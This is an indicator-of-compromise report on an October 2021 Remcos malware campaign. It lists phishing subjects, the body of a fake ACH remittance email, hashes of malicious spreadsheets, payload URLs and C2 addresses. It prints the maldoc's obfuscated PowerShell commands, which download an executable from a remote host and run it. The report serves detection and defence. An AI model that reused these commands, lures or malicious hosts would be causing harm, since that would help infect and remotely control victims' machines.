2021-10-15 Remcos IOCs
THREAT IDENTIFICATION: REMCOS
SUBJECTS OBSERVED
ACH Remittance Advice
Remittance
SENDERS OBSERVED
EMAIL BODY
Payment receipt
Invoice #2020821
for ACH Remittance Advice
Paid on OCTOBER 15,2021
The Ink Supplies Corp
2093 PHILADELPHIA PIKE #5003
Claymont, Delaware 19703
United States
Kindly confirm receipt
Best Regards,
Accounts Payable
MALDOC FILE HASHES
ACH Remittance Advice.xls
114ca1de991bc21ca9b88481de97cf92
Remittance Advice File.xls
ca027182d31698dcbb704e0d1a7c28d2
travelespecially.cmd
5ea928ce876726d313001f5cbd14bc65
POWERSHELL FROM MALDOC
C:\Users\analyst\Documents>powershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`p://greenpayindia.com/wp-conternt/ConsoleApp18.e`xe -Destination C:\Users\Public\Documents\brotherneed.e`xe;C:\Users\Public\Documents\brotherneed.e`xe
C:\Users\analyst\Documents>powershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`p://thepunchlineexpose.com/Manager/AnyDesk.e`xe -Destination C:\Users\Public\Documents\weekshe.e`xe;C:\Users\Public\Documents\weekshe.e`xe
PAYLOAD DOWNLOAD URL
http://greenpayindia.com/wp-conternt/ConsoleApp18.exe
http://thepunchlineexpose.com/Manager/AnyDesk.exe
REMCOS PAYLOAD FILE HASH
brotherneed.exe
aade455507f667318c83c42a95b3fc3c
It was renamed and copied as:
notepad.exe
aade455507f667318c83c42a95b3fc3c
REMCOS C2
lplazadtemins.duckdns.org:443
194.147.140.45:443
SUPPORTING EVIDENCE
https://tria.ge/211014-ye79wababj